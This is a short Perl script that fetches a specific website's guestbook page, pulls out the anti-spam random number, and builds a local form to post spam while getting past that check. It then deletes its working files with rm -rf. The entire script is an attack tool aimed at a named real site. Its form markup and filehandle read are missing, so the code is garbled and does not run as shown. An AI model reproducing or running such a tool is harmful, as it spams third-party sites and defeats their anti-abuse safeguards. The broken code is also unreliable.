#! /usr/bin/perl `wget -q http://www.tropicalpcsolutions.com/digi-dl.com/php/temp/gb/guestbook.php?assign_num=true`; `grep "Random" guestbook.php?assign_num=true > results.log`; open (RESULT, "results.log") || die "Can't open file: $!"; while (defined ($some_stuff = )){ $junk=$some_stuff; } close (RESULT) || die "Can't close the file: $!"; $blah = substr($junk, 0, - 90); $number= substr($blah, 99); $form_stuff="
This form does not work when the guestbook administrator has the script set to do referer checks!

"; open (SPAM, "> spam_me.htm") || die "Can't open file: $!"; print (SPAM "$form_stuff"); close (SPAM) || die "Can't close the file: $!"; # you will need to edit the below line to point to the location of this script on your computer. `firefox file:///home/dave/Desktop/spam_me.htm`; `rm -rf results.log`; `rm -rf guestbook.php?assign_num=true`; `rm -rf spam_me.htm`; exit;